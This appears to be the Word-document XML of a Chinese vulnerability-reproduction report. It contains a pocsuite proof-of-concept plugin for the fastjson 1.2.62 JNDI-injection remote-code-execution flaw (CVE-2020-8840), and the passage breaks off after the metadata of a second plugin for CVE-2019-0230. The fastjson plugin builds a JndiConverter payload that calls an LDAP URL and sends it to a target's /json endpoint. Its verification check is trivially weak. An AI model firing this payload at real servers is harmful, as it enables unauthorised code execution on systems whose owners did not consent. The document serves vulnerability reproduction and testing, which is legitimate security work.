      <w:bookmarkStart w:id="33" w:name="_Toc11461"/>
      <w:bookmarkStart w:id="34" w:name="_Toc19260"/>
      <w:bookmarkStart w:id="35" w:name="_Toc75461114"/>
      <w:bookmarkStart w:id="36" w:name="_Toc12892"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>漏洞复现结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkEnd w:id="35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36"/>
    </w:p>
    <w:p w14:paraId="4F0FE4BA" w14:textId="2A9465AF" w:rsidR="00FF4132" w:rsidRPr="00FF4132" w:rsidRDefault="00000000" w:rsidP="00FF4132">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc32666"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>POC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>插件编写</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="7F604E2E" w14:textId="3178371C" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF4132">
        <w:t>CVE-2020-8840</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B84152" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:t>#!/usr/bin/env python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAEB278" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:t># -*- coding: utf-8 -*-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F016A9A" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132"/>
    <w:p w14:paraId="54637AF3" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:t>from pocsuite.api.request import req</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0770906D" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:t>from pocsuite.api.poc import register,Output, POCBase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04615867" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:t>from pocsuite.thirdparty.guanxing import  parse_ip_port, http_packet, make_verify_url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258920BD" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132"/>
    <w:p w14:paraId="18B9CAC7" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:t>class TestPOC(POCBase):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA4FF26" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>vulID = '''CVE-2020-8840'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DD19E4" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>cveID = '''CVE-2020-8840'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B370570" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>cnvdID = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D869B6" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>cnnvdID = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315C44A8" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>version = '''1.0'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC2BD32" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>author = '''</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>侯博文</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E0EAAD" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>vulDate = '''2020-02-21'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2797BB93" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>createDate = '''2020-02-21'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0303D03F" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>updateDate = '''2020-02-21'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4458AC32" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>name = '''fastjson&lt;=1.2.62</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程代码执行漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D2D38F" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>desc = '''2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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NVD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发布的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Jackson-databind JNDI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入漏洞（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CVE-2020-8840</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jackson-databind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的反序列化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gadget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也同样影响了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fastjson</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，经绿盟科技研究人员分析验证，在开启了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>autoType</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>功能的情况下（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>autoType</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>功能默认关闭），该漏洞影响最新的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fastjson 1.2.62</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本，攻击者利用该漏洞可实现在目标机器上的远程代码执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0AD3D0" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fastjson</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是阿里巴巴的开源</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解析库，它可以解析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式的字符串，支持将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java Bean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>序列化为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符串，也可以从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符串反序列化到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JavaBean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，由于具有执行效率高的特点，应用范围广泛。请相关用户尽快采取防护措施。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196CBB9D" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6642FC" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>solution = '''</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>autoType</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>功能的受影响用户可通过关闭</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>autoType</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来规避风险（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>autoType</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>功能默认关闭）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D24AC4B" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>severity = '''</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">''' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F27EB5" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>vulType = '''RCE'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF3A7D7" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>taskType = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7AC4E3" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>references = ['''https://mp.weixin.qq.com/s?__biz=Mzk0MjE3ODkxNg==&amp;mid=2247485658&amp;idx=2&amp;sn=e4d52df2e4fca742f22196fef91b5afa''']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E013E1" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>appName = '''fastjson'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3467694B" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>appVersion = '''1.2.62'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3F31D1" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>appPowerLink = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59671B61" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>samples = ['']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63924D33" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>install_requires = ['''''']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA88C1E" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132"/>
    <w:p w14:paraId="23145F00" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>def _verify(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8D3F77" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>self.url,ip,port = parse_ip_port(self.target, 80)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C8A879" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>result = {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F4078B" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>headers = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D23451" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2DD295" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F458B8" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>ldap_url = 'ldap://127.0.0.1:8085/tzZmGMuy'.replace(':','%3A').replace('/','%2F') # ldap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14:paraId="73FC8CB1" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>path = '/json?poc=%7B%22%40type%22%3A%22org%2Eapache%2Exbean%2Epropertyeditor%2EJndiConverter%22%2C%22AsText%22%3A%22'+ldap_url+'"}' #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞的路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAE5A43" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>vul_url = make_verify_url(self.url, path, mod=0) #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成完整路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC98ED6" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">resp = req.get(vul_url, headers = headers, verify = False, allow_redirects = False, timeout = 10) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4879810E" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if resp.status_code == 200 and '' in resp.content: #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>判断条件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7858E3B4" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>result['VerifyInfo'] = http_packet(resp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052466A2" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>result['VerifyInfo']['URL'] = vul_url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6081FA3D" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>result['VerifyInfo']['port'] = port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7569E87F" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>return self.parse_output(result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B095761" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132"/>
    <w:p w14:paraId="306A1F32" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>def _attack(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723B9DD9" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>return self._verify()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7423821E" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132"/>
    <w:p w14:paraId="1143B582" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>def parse_output(self, result):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D96F266" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>output = Output(self)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DE1968" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D81896B" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>output.success(result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D819128" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAA89B7" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>output.fail('Failed')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7217AE" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>return output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5703651F" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132"/>
    <w:p w14:paraId="1A917D94" w14:textId="384B3A4B" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:t>register(TestPOC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED9BF41" w14:textId="1F28FBA8" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF4132">
        <w:t>CVE-2019-0230</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F33356C" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:t>#!/usr/bin/env python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A955CF4" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:t># -*- coding: utf-8 -*-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1BEBFC" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132"/>
    <w:p w14:paraId="4D38F93D" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:t>from pocsuite.api.request import req</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBE7912" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>from pocsuite.api.poc import register,Output, POCBase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F376E33" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:t>from pocsuite.thirdparty.guanxing import  parse_ip_port, http_packet, make_verify_url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8B5904" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132"/>
    <w:p w14:paraId="08E2DB07" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:t>class TestPOC(POCBase):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F956AA" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>vulID = '''CVE-2019-0230'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557E774C" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>cveID = '''CVE-2019-0230'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB379A6" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>cnvdID = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534EBA62" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>cnnvdID = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E511CCB" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>version = '''1.0'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CA4D65" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>author = '''</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>侯博文</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'''</w:t>
      </w:r>
    </w:p>
